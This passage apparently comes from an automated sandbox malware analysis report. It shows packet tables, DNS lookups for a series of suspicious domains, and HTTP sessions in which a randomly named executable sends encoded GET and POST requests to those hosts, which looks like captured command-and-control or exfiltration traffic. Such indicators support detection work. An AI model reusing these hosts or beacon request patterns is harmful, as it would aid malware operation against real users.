Nov 1, 2024 03:48:03.255331039 CET	50021	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:03.257044077 CET	50021	80	192.168.2.5	38.88.82.56
Nov 1, 2024 03:48:03.261785984 CET	80	50021	38.88.82.56	192.168.2.5
Nov 1, 2024 03:48:08.288105965 CET	50022	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:08.293126106 CET	80	50022	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:08.293200016 CET	50022	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:08.334762096 CET	50022	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:08.339643955 CET	80	50022	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:08.920172930 CET	80	50022	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:08.920253992 CET	50022	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:09.840321064 CET	50022	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:09.845285892 CET	80	50022	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:10.861290932 CET	50023	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:10.866266012 CET	80	50023	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:10.868243933 CET	50023	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:10.880192995 CET	50023	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:10.885149956 CET	80	50023	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:11.485369921 CET	80	50023	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:11.486249924 CET	50023	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:12.387226105 CET	50023	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:12.392822027 CET	80	50023	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:13.406164885 CET	50024	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:13.411189079 CET	80	50024	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:13.418174982 CET	50024	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:13.424329996 CET	50024	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:13.429137945 CET	80	50024	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:13.429260969 CET	80	50024	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:14.044534922 CET	80	50024	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:14.044588089 CET	50024	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:14.936304092 CET	50024	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:14.941256046 CET	80	50024	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:15.953883886 CET	50025	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:15.959222078 CET	80	50025	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:15.959327936 CET	50025	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:15.968162060 CET	50025	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:15.973155022 CET	80	50025	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:16.587919950 CET	80	50025	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:16.588499069 CET	80	50025	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:16.588598967 CET	50025	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:16.590820074 CET	50025	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:48:16.595587015 CET	80	50025	3.33.130.190	192.168.2.5
Nov 1, 2024 03:48:21.624768972 CET	50026	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:21.629767895 CET	80	50026	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:21.629960060 CET	50026	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:21.639082909 CET	50026	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:21.644742966 CET	80	50026	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:22.433681011 CET	80	50026	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:22.480786085 CET	50026	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:22.538654089 CET	80	50026	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:22.538712978 CET	50026	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:23.152772903 CET	50026	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:24.172243118 CET	50027	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:24.177216053 CET	80	50027	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:24.177300930 CET	50027	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:24.190325975 CET	50027	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:24.196266890 CET	80	50027	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:25.699765921 CET	50027	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:25.705086946 CET	80	50027	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:25.705142021 CET	50027	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:26.718189955 CET	50028	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:26.723258018 CET	80	50028	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:26.726300955 CET	50028	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:26.738183975 CET	50028	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:26.743175030 CET	80	50028	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:26.743777990 CET	80	50028	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:27.536863089 CET	80	50028	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:27.642448902 CET	80	50028	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:27.646265030 CET	50028	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:28.246506929 CET	50028	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:29.272396088 CET	50029	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:29.277482033 CET	80	50029	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:29.277597904 CET	50029	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:29.286230087 CET	50029	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:29.291057110 CET	80	50029	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:30.082751989 CET	80	50029	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:30.137036085 CET	50029	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:30.204785109 CET	80	50029	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:30.204915047 CET	50029	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:30.205900908 CET	50029	80	192.168.2.5	178.79.184.196
Nov 1, 2024 03:48:30.211164951 CET	80	50029	178.79.184.196	192.168.2.5
Nov 1, 2024 03:48:43.318206072 CET	50030	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:43.323353052 CET	80	50030	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:43.323570013 CET	50030	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:43.334203005 CET	50030	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:43.339046955 CET	80	50030	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:44.206681013 CET	80	50030	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:44.206696987 CET	80	50030	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:44.206758976 CET	50030	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:44.842214108 CET	50030	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:45.859006882 CET	50031	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:45.864085913 CET	80	50031	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:45.864155054 CET	50031	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:45.875808954 CET	50031	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:45.880582094 CET	80	50031	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:46.737658978 CET	80	50031	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:46.740251064 CET	80	50031	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:46.746197939 CET	50031	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:47.387120008 CET	50031	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:48.405591011 CET	50032	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:48.411070108 CET	80	50032	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:48.411184072 CET	50032	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:48.422061920 CET	50032	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:48.427136898 CET	80	50032	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:48.427146912 CET	80	50032	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:49.309011936 CET	80	50032	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:49.309043884 CET	80	50032	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:49.309149027 CET	50032	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:49.311727047 CET	80	50032	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:49.311827898 CET	50032	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:49.935142040 CET	50032	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:50.955171108 CET	50033	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:50.960030079 CET	80	50033	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:50.960163116 CET	50033	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:50.967103004 CET	50033	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:50.971967936 CET	80	50033	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:51.877824068 CET	80	50033	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:51.879640102 CET	80	50033	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:51.879695892 CET	50033	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:51.881345987 CET	50033	80	192.168.2.5	188.114.96.3
Nov 1, 2024 03:48:51.886205912 CET	80	50033	188.114.96.3	192.168.2.5
Nov 1, 2024 03:48:57.665544033 CET	50034	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:48:57.670521975 CET	80	50034	103.191.208.137	192.168.2.5
Nov 1, 2024 03:48:57.674350023 CET	50034	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:48:57.686238050 CET	50034	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:48:57.691150904 CET	80	50034	103.191.208.137	192.168.2.5
Nov 1, 2024 03:48:59.199686050 CET	50034	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:48:59.211070061 CET	80	50034	103.191.208.137	192.168.2.5
Nov 1, 2024 03:48:59.214267969 CET	50034	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:00.219156981 CET	50035	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:00.224304914 CET	80	50035	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:00.224390984 CET	50035	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:00.238840103 CET	50035	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:00.243709087 CET	80	50035	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:01.748538971 CET	50035	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:01.754681110 CET	80	50035	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:01.754754066 CET	50035	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:02.973678112 CET	50036	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:02.978698015 CET	80	50036	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:02.978774071 CET	50036	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:02.992240906 CET	50036	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:02.997076988 CET	80	50036	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:02.997148991 CET	80	50036	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:04.496536016 CET	50036	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:04.501815081 CET	80	50036	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:04.502247095 CET	50036	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:05.516272068 CET	50037	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:05.521228075 CET	80	50037	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:05.521356106 CET	50037	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:05.938589096 CET	50037	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:05.943496943 CET	80	50037	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:07.986437082 CET	80	50037	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:08.027741909 CET	50037	80	192.168.2.5	103.191.208.137
Nov 1, 2024 03:49:08.244961023 CET	80	50037	103.191.208.137	192.168.2.5
Nov 1, 2024 03:49:08.245089054 CET	50037	80	192.168.2.5	103.191.208.137

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 03:45:36.116466045 CET	49544	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:45:36.138871908 CET	53	49544	1.1.1.1	192.168.2.5
Nov 1, 2024 03:45:51.827657938 CET	58374	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:45:52.114075899 CET	53	58374	1.1.1.1	192.168.2.5
Nov 1, 2024 03:46:05.500261068 CET	49878	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:46:05.511204958 CET	53	49878	1.1.1.1	192.168.2.5
Nov 1, 2024 03:46:19.343643904 CET	51837	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:46:19.470876932 CET	53	51837	1.1.1.1	192.168.2.5
Nov 1, 2024 03:46:32.859273911 CET	51417	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:46:32.872961044 CET	53	51417	1.1.1.1	192.168.2.5
Nov 1, 2024 03:46:46.265453100 CET	56592	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:46:46.275939941 CET	53	56592	1.1.1.1	192.168.2.5
Nov 1, 2024 03:47:00.609903097 CET	62892	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:47:00.653040886 CET	53	62892	1.1.1.1	192.168.2.5
Nov 1, 2024 03:47:13.953762054 CET	50567	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:47:13.964221954 CET	53	50567	1.1.1.1	192.168.2.5
Nov 1, 2024 03:47:27.486134052 CET	58180	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:47:27.555471897 CET	53	58180	1.1.1.1	192.168.2.5
Nov 1, 2024 03:47:40.844247103 CET	60205	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:47:40.857229948 CET	53	60205	1.1.1.1	192.168.2.5
Nov 1, 2024 03:47:54.220102072 CET	54853	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:47:54.829143047 CET	53	54853	1.1.1.1	192.168.2.5
Nov 1, 2024 03:48:08.265604973 CET	52336	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:48:08.283443928 CET	53	52336	1.1.1.1	192.168.2.5
Nov 1, 2024 03:48:21.609810114 CET	56466	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:48:21.622801065 CET	53	56466	1.1.1.1	192.168.2.5
Nov 1, 2024 03:48:35.218849897 CET	59770	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:48:35.229847908 CET	53	59770	1.1.1.1	192.168.2.5
Nov 1, 2024 03:48:43.298198938 CET	61340	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:48:43.311152935 CET	53	61340	1.1.1.1	192.168.2.5
Nov 1, 2024 03:48:56.890881062 CET	51860	53	192.168.2.5	1.1.1.1
Nov 1, 2024 03:48:57.660835981 CET	53	51860	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 03:45:36.116466045 CET	192.168.2.5	1.1.1.1	0x11b0	Standard query (0)	www.ladylawher.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:45:51.827657938 CET	192.168.2.5	1.1.1.1	0x9376	Standard query (0)	www.meanttobebroken.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:05.500261068 CET	192.168.2.5	1.1.1.1	0x50d3	Standard query (0)	www.jexiz.shop	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:19.343643904 CET	192.168.2.5	1.1.1.1	0xc547	Standard query (0)	www.prediksipreman.fyi	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:32.859273911 CET	192.168.2.5	1.1.1.1	0x17e7	Standard query (0)	www.givora.site	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:46.265453100 CET	192.168.2.5	1.1.1.1	0x18e3	Standard query (0)	www.2925588.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:00.609903097 CET	192.168.2.5	1.1.1.1	0x2210	Standard query (0)	www.wrl-llc.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:13.953762054 CET	192.168.2.5	1.1.1.1	0xef7e	Standard query (0)	www.7fh27o.vip	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:27.486134052 CET	192.168.2.5	1.1.1.1	0x6377	Standard query (0)	www.rebel.tienda	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:40.844247103 CET	192.168.2.5	1.1.1.1	0x8fde	Standard query (0)	www.ila.beauty	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:54.220102072 CET	192.168.2.5	1.1.1.1	0xf051	Standard query (0)	www.college-help.info	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:08.265604973 CET	192.168.2.5	1.1.1.1	0xb2be	Standard query (0)	www.owinvip.net	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:21.609810114 CET	192.168.2.5	1.1.1.1	0xccf	Standard query (0)	www.gucciqueen.shop	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:35.218849897 CET	192.168.2.5	1.1.1.1	0x2e79	Standard query (0)	www.xtelify.tech	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:43.298198938 CET	192.168.2.5	1.1.1.1	0xdeaf	Standard query (0)	www.timizoasisey.shop	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:56.890881062 CET	192.168.2.5	1.1.1.1	0x37f4	Standard query (0)	www.roopiedutech.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 03:45:36.138871908 CET	1.1.1.1	192.168.2.5	0x11b0	No error (0)	www.ladylawher.org	ladylawher.org		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:45:36.138871908 CET	1.1.1.1	192.168.2.5	0x11b0	No error (0)	ladylawher.org		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:45:36.138871908 CET	1.1.1.1	192.168.2.5	0x11b0	No error (0)	ladylawher.org		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:45:52.114075899 CET	1.1.1.1	192.168.2.5	0x9376	No error (0)	www.meanttobebroken.org		141.193.213.10	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:45:52.114075899 CET	1.1.1.1	192.168.2.5	0x9376	No error (0)	www.meanttobebroken.org		141.193.213.11	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:05.511204958 CET	1.1.1.1	192.168.2.5	0x50d3	No error (0)	www.jexiz.shop	jexiz.shop		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:46:05.511204958 CET	1.1.1.1	192.168.2.5	0x50d3	No error (0)	jexiz.shop		8.210.3.99	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:19.470876932 CET	1.1.1.1	192.168.2.5	0xc547	No error (0)	www.prediksipreman.fyi	prediksipreman.fyi		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:46:19.470876932 CET	1.1.1.1	192.168.2.5	0xc547	No error (0)	prediksipreman.fyi		162.0.215.244	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:32.872961044 CET	1.1.1.1	192.168.2.5	0x17e7	No error (0)	www.givora.site		162.0.231.203	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:46:46.275939941 CET	1.1.1.1	192.168.2.5	0x18e3	No error (0)	www.2925588.com		103.71.154.12	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:00.653040886 CET	1.1.1.1	192.168.2.5	0x2210	No error (0)	www.wrl-llc.net	wrl-llc.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:47:00.653040886 CET	1.1.1.1	192.168.2.5	0x2210	No error (0)	wrl-llc.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:00.653040886 CET	1.1.1.1	192.168.2.5	0x2210	No error (0)	wrl-llc.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:13.964221954 CET	1.1.1.1	192.168.2.5	0xef7e	No error (0)	www.7fh27o.vip	7fh27o.vip		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:47:13.964221954 CET	1.1.1.1	192.168.2.5	0xef7e	No error (0)	7fh27o.vip		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:13.964221954 CET	1.1.1.1	192.168.2.5	0xef7e	No error (0)	7fh27o.vip		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:27.555471897 CET	1.1.1.1	192.168.2.5	0x6377	No error (0)	www.rebel.tienda		199.59.243.227	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:40.857229948 CET	1.1.1.1	192.168.2.5	0x8fde	No error (0)	www.ila.beauty		13.248.169.48	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:40.857229948 CET	1.1.1.1	192.168.2.5	0x8fde	No error (0)	www.ila.beauty		76.223.54.146	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:47:54.829143047 CET	1.1.1.1	192.168.2.5	0xf051	No error (0)	www.college-help.info		38.88.82.56	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:08.283443928 CET	1.1.1.1	192.168.2.5	0xb2be	No error (0)	www.owinvip.net	owinvip.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:48:08.283443928 CET	1.1.1.1	192.168.2.5	0xb2be	No error (0)	owinvip.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:08.283443928 CET	1.1.1.1	192.168.2.5	0xb2be	No error (0)	owinvip.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:21.622801065 CET	1.1.1.1	192.168.2.5	0xccf	No error (0)	www.gucciqueen.shop	gucciqueen.shop		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:48:21.622801065 CET	1.1.1.1	192.168.2.5	0xccf	No error (0)	gucciqueen.shop		178.79.184.196	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:35.229847908 CET	1.1.1.1	192.168.2.5	0x2e79	Name error (3)	www.xtelify.tech	none	none	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:43.311152935 CET	1.1.1.1	192.168.2.5	0xdeaf	No error (0)	www.timizoasisey.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:43.311152935 CET	1.1.1.1	192.168.2.5	0xdeaf	No error (0)	www.timizoasisey.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 03:48:57.660835981 CET	1.1.1.1	192.168.2.5	0x37f4	No error (0)	www.roopiedutech.online	roopiedutech.online		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 03:48:57.660835981 CET	1.1.1.1	192.168.2.5	0x37f4	No error (0)	roopiedutech.online		103.191.208.137	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.ladylawher.org

www.meanttobebroken.org

www.jexiz.shop

www.prediksipreman.fyi

www.givora.site

www.2925588.com

www.wrl-llc.net

www.7fh27o.vip

www.rebel.tienda

www.ila.beauty

www.college-help.info

www.owinvip.net

www.gucciqueen.shop

www.timizoasisey.shop

www.roopiedutech.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49791	3.33.130.190	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:45:36.158591032 CET	468	OUT	GET /up8i/?nl=FonQAt5G6G0h5a/+Am3eqIyjBFdIhrbRfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQd8jl3rIdXyfOz7R8oVB6YJtxbdf5wDUy9RxP636EXq/xHTA==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.ladylawher.org User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:45:36.775532007 CET	410	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 02:45:36 GMT Content-Type: text/html Content-Length: 270 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 6c 3d 46 6f 6e 51 41 74 35 47 36 47 30 68 35 61 2f 2b 41 6d 33 65 71 49 79 6a 42 46 64 49 68 72 62 52 66 47 35 6e 78 50 46 67 55 73 31 63 73 6e 68 73 2b 6c 42 58 65 77 78 74 38 39 43 6a 35 56 6f 69 78 75 37 6a 4c 56 78 57 42 32 68 48 73 4e 50 6d 6e 70 51 64 38 6a 6c 33 72 49 64 58 79 66 4f 7a 37 52 38 6f 56 42 36 59 4a 74 78 62 64 66 35 77 44 55 79 39 52 78 50 36 33 36 45 58 71 2f 78 48 54 41 3d 3d 26 64 62 4c 3d 64 38 57 58 5f 76 30 50 47 56 48 58 41 74 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nl=FonQAt5G6G0h5a/+Am3eqIyjBFdIhrbRfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQd8jl3rIdXyfOz7R8oVB6YJtxbdf5wDUy9RxP636EXq/xHTA==&dbL=d8WX_v0PGVHXAtK"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49881	141.193.213.10	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:45:52.132998943 CET	735	OUT	POST /9g6s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.meanttobebroken.org Origin: http://www.meanttobebroken.org Referer: http://www.meanttobebroken.org/9g6s/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 6f 39 2f 65 75 4a 74 44 6f 41 32 50 33 38 78 61 56 58 70 54 4d 32 43 77 6b 59 4c 68 72 58 76 6f 55 4f 45 7a 71 65 42 4c 34 4e 36 4f 68 36 67 4c 65 6b 77 71 61 46 4b 41 66 59 67 70 36 38 47 72 75 39 64 73 63 7a 79 58 4f 55 36 35 70 6c 6a 55 69 76 67 4b 4d 6f 34 73 51 6f 39 2f 4d 39 32 36 5a 73 42 71 32 4a 78 67 65 50 43 6e 49 4b 43 71 63 44 4e 35 6b 70 4e 6d 6a 4b 37 30 63 48 4c 46 63 32 61 65 72 2f 48 43 31 4d 4a 75 61 42 52 51 37 34 58 70 39 55 45 4f 68 37 4e 59 37 4e 36 57 62 58 6d 74 73 76 65 4e 39 54 46 6a 53 46 7a 41 57 2f 6b 44 4f 34 37 4a 4e 47 6b 5a 4e 34 51 2b 75 72 67 76 4d 36 45 3d Data Ascii: 